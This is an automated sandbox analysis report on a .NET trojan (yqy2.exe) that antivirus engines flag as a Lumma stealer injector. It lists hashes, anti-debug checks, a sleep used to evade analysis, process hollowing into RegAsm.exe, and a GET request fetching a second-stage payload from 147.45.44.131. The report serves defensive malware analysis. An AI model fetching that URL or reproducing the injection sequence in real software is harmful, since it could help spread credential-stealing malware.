Summary | ZeroBOX

yqy2.exe

ScreenShot AntiDebug PE File PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 17, 2024, 1:21 p.m. Sept. 17, 2024, 2:24 p.m.
Size 14.5KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 243060d6f56395aa66e64418b9d299b1
SHA256 b72cff53d2d6e8c9ba1aed99c4bb11497b8f724c39c4d69250cdd42e7477141f
CRC32 0F5FA49B
ssdeep 384:ByXkMSdXUDg+jbzuOnG4s1j5Mqa/FMhR6AA30Y:BotD1G4Sn
PDB Path C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\Sentiments.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\Sentiments.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.131/files/wywy8.exe
request GET http://147.45.44.131/files/wywy8.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00490000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2644
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2644
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00412000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00445000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00437000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00661000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 147.45.44.131
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 360448
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000438
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description yqy2.exe tried to sleep 5456326 seconds, actually delayed analysis time by 5456326 seconds
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL9$Ûfà ôÄÀ @€@…q4x0PA”5¨.textáóô `.rdata(*ø@@.dataÄë@X"@À.relocPA0Bz@B
base_address: 0x00400000
process_identifier: 2816
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2816
process_handle: 0x00000438
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL9$Ûfà ôÄÀ @€@…q4x0PA”5¨.textáóô `.rdata(*ø@@.dataÄë@X"@À.relocPA0Bz@B
base_address: 0x00400000
process_identifier: 2816
process_handle: 0x00000438
1 1 0
Process injection Process 2644 called NtSetContextThread to modify thread in remote process 2816
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4235456
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000434
process_identifier: 2816
1 0 0
Process injection Process 2644 resumed a thread in remote process 2816
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000434
suspend_count: 1
process_identifier: 2816
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x00000344
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x00000378
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x000003ac
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x000003c4
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x000003e8
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x000003fc
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x00000414
suspend_count: 1
process_identifier: 2644
1 0 0

NtResumeThread

thread_handle: 0x00000428
suspend_count: 1
process_identifier: 2644
1 0 0

CreateProcessInternalW

thread_identifier: 2820
thread_handle: 0x00000434
process_identifier: 2816
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

NtGetContextThread

thread_handle: 0x00000434
1 0 0

NtAllocateVirtualMemory

process_identifier: 2816
region_size: 360448
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000438
1 0 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL9$Ûfà ôÄÀ @€@…q4x0PA”5¨.textáóô `.rdata(*ø@@.dataÄë@X"@À.relocPA0Bz@B
base_address: 0x00400000
process_identifier: 2816
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2816
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00441000
process_identifier: 2816
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00444000
process_identifier: 2816
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00453000
process_identifier: 2816
process_handle: 0x00000438
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2816
process_handle: 0x00000438
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4235456
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000434
process_identifier: 2816
1 0 0

NtResumeThread

thread_handle: 0x00000434
suspend_count: 1
process_identifier: 2816
1 0 0
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Generic.m289
CAT-QuickHeal Trojan.Generic
Skyhigh Artemis!Trojan
Cylance Unsafe
VIPRE Gen:Heur.MSIL.Krypt.6
Sangfor Trojan.Win32.Injector.V5x3
CrowdStrike win/malicious_confidence_100% (D)
BitDefender Gen:Heur.MSIL.Krypt.6
K7GW Trojan ( 0050bedf1 )
K7AntiVirus Trojan ( 0050bedf1 )
Arcabit Trojan.MSIL.Krypt.6
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Injector.LOS
Avast Win32:PWSX-gen [Trj]
ClamAV Win.Packed.Pwsx-10035668-0
Kaspersky HEUR:Trojan.Win32.Generic
Alibaba Trojan:MSIL/Injector.367b1806
MicroWorld-eScan Gen:Heur.MSIL.Krypt.6
Rising Trojan.Injector!8.C4 (CLOUD)
Emsisoft Gen:Heur.MSIL.Krypt.6 (B)
F-Secure Trojan.TR/AVI.Lumma.ssylu
DrWeb Trojan.InjectNET.17
TrendMicro TrojanSpy.Win32.LUMMASTEALER.YXEIIZ
McAfeeD ti!B72CFF53D2D6
CTX exe.trojan.msil
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.243060d6f56395aa
Webroot W32.Malware.Gen
Google Detected
Avira TR/AVI.Lumma.ssylu
Antiy-AVL Trojan/Win32.Agent
Kingsoft Win32.Trojan.Generic.a
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Malware@#qnzhuzfz8mz2
Microsoft Trojan:Win32/Multiverze
ZoneAlarm HEUR:Trojan.Win32.Generic
GData Gen:Heur.MSIL.Krypt.6
Varist W32/MSIL_Troj.C.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.C5663268
McAfee Artemis!243060D6F563
DeepInstinct MALICIOUS
VBA32 Trojan.MSIL.DiscoStealer.Heur
Ikarus Trojan.MSIL.Injector
Panda Trj/GdSda.A
TrendMicro-HouseCall TrojanSpy.Win32.LUMMASTEALER.YXEIIZ
Tencent Malware.Win32.Gencirc.14195d39
Yandex Trojan.Agent!dfzdFVVJYYA